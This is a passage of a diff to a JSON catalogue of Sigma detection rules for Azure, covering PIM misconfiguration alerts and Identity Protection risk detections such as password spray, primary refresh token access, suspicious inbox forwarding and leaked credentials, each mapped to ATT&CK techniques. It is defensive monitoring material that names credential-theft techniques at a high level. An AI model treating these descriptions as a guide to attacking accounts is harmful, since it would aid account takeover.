"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" ], @@ -84674,9 +86270,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" ], @@ -84818,9 +86414,9 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" ], @@ -84924,9 +86520,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], @@ -85557,9 +87153,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" ], @@ -85586,9 +87182,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" ], @@ -85609,6 +87205,695 @@ "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "value": "Azure Kubernetes Service Account Modified or Deleted" }, + { + "description": "Identifies an event where there are there are too many accounts assigned the Global Administrator role.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate if threshold setting in PIM is too low." + ], + "filename": "azure_pim_too_many_global_admins.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "7bbc309f-e2b1-4eb1-8369-131a367d67d3", + "value": "Too Many Global Admins" + }, + { + "description": "Identifies when a user has been assigned a privilege role and are not using that role.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate if potential generic account that cannot be removed." + ], + "filename": "azure_pim_role_not_used.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "8c6ec464-4ae4-43ac-936a-291da66ed13d", + "value": "Roles Are Not Being Used" + }, + { + "description": "Identifies when the same privilege role has multiple activations by the same user.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate where if active time period for a role is set too short." + ], + "filename": "azure_pim_role_frequent_activation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "645fd80d-6c07-435b-9e06-7bc1b5656cba", + "value": "Roles Activated Too Frequently" + }, + { + "description": "Identifies when an organization doesn't have the proper license for PIM and is out of compliance.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate if licenses have expired." + ], + "filename": "azure_pim_invalid_license.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "58af08eb-f9e1-43c8-9805-3ad9b0482bd8", + "value": "Invalid PIM License" + }, + { + "description": "Identifies when a privilege role can be activated without performing mfa.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate if user is performing MFA at sign-in." + ], + "filename": "azure_pim_role_no_mfa_required.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "94a66f46-5b64-46ce-80b2-75dcbe627cc0", + "value": "Roles Activation Doesn't Require MFA" + }, + { + "description": "Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there." + ], + "filename": "azure_pim_role_assigned_outside_of_pim.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", + "value": "Roles Assigned Outside PIM" + }, + { + "description": "Identifies when an account hasn't signed in during the past n number of days.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/14", + "falsepositive": [ + "Investigate if potential generic account that cannot be removed." + ], + "filename": "azure_pim_account_stale.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e402c26a-267a-45bd-9615-bd9ceda6da85", + "value": "Stale Accounts In A Privileged Role" + }, + { + "description": "Indicates that a password spray attack has been successfully performed.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_password_spray.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml" + ], + "tags": [ + "attack.t1110", + "attack.credential_access" + ] + }, + "related": [ + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "28ecba0a-c743-4690-ad29-9a8f6f25a6f9", + "value": "Password Spray Activity" + }, + { + "description": "Detects suspicious rules that delete or move messages or folders are set on a user's inbox.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "Actual mailbox rules that are moving items based on their workflow." + ], + "filename": "azure_identity_protection_inbox_manipulation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml" + ], + "tags": [ + "attack.t1140", + "attack.defense_evasion" + ] + }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "ceb55fd0-726e-4656-bf4e-b585b7f7d572", + "value": "Suspicious Inbox Manipulation Rules" + }, + { + "description": "Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.", + "meta": { + "author": "Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/08/22", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins" + ], + "filename": "azure_identity_protection_anonymous_ip_address.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address", + "https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml" + ], + "tags": [ + "attack.t1528", + "attack.credential_access" + ] + }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "53acd925-2003-440d-a1f3-71a5253fe237", + "value": "Anonymous IP Address" + }, + { + "description": "Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_new_coutry_region.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "adf9f4d2-559e-4f5c-95be-c28dff0b1476", + "value": "New Country" + }, + { + "description": "Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "A legitmate forwarding rule." + ], + "filename": "azure_identity_protection_inbox_forwarding_rule.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml" + ], + "tags": [ + "attack.t1140", + "attack.defense_evasion" + ] + }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", + "value": "Suspicious Inbox Forwarding Identity Protection" + }, + { + "description": "Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_atypical_travel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "1a41023f-1e70-4026-921a-4d9341a9038e", + "value": "Atypical Travel" + }, + { + "description": "Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated." + ], + "filename": "azure_identity_protection_prt_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml" + ], + "tags": [ + "attack.t1528", + "attack.credential_access" + ] + }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a84fc3b1-c9ce-4125-8e74-bdcdb24021f1", + "value": "Primary Refresh Token Access Attempt" + }, + { + "description": "Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "Using an IP address that is shared by many users" + ], + "filename": "azure_identity_protection_malware_linked_ip.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml" + ], + "tags": [ + "attack.t1090", + "attack.command_and_control" + ] + }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "821b4dc3-1295-41e7-b157-39ab212dd6bd", + "value": "Sign-In From Malware Infected IP" + }, + { + "description": "Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_malicious_ip_address_suspicious.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" + ], + "tags": [ + "attack.t1090", + "attack.command_and_control" + ] + }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "36440e1c-5c22-467a-889b-593e66498472", + "value": "Malicious IP Address Sign-In Suspicious" + }, + { + "description": "Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "User changing to a new device, location, browser, etc." + ], + "filename": "azure_identity_protection_unfamilar_sign_in.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "128faeef-79dd-44ca-b43c-a9e236a60f49", + "value": "Unfamiliar Sign-In Properties" + }, + { + "description": "Indicates sign-in from a malicious IP address based on high failure rates.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_malicious_ip_address.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" + ], + "tags": [ + "attack.t1090", + "attack.command_and_control" + ] + }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", + "value": "Malicious IP Address Sign-In Failure Rate" + }, + { + "description": "Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_token_issuer_anomaly.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml" + ], + "tags": [ + "attack.t1606", + "attack.credential_access" + ] + }, + "related": [ + { + "dest-uuid": "94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e3393cba-31f0-4207-831e-aef90ab17a8c", + "value": "SAML Token Issuer Anomaly" + }, + { + "description": "Indicates that the user's valid credentials have been leaked.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "A rare hash collision." + ], + "filename": "azure_identity_protection_leaked_credentials.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml" + ], + "tags": [ + "attack.t1589", + "attack.reconnaissance" + ] + }, + "related": [ + { + "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "19128e5e-4743-48dc-bd97-52e5775af817", + "value": "Azure AD Account Credential Leaked" + }, { "description": "Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.", "meta": { @@ -85617,14 +87902,14 @@ "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], - "filename": "azure_identity_protectection_anomalous_token.yml", + "filename": "azure_identity_protection_anomalous_token.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protectection_anomalous_token.yml" + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml" ], "tags": [ "attack.t1528", @@ -85643,6 +87928,189 @@ "uuid": "6555754e-5e7f-4a67-ad1c-4041c413a007", "value": "Anomalous Token" }, + { + "description": "Indicates user activity that is unusual for the user or consistent with known attack patterns.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_threat_intel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", + "value": "Azure AD Threat Intelligence" + }, + { + "description": "Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_anonymous_ip_activity.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + 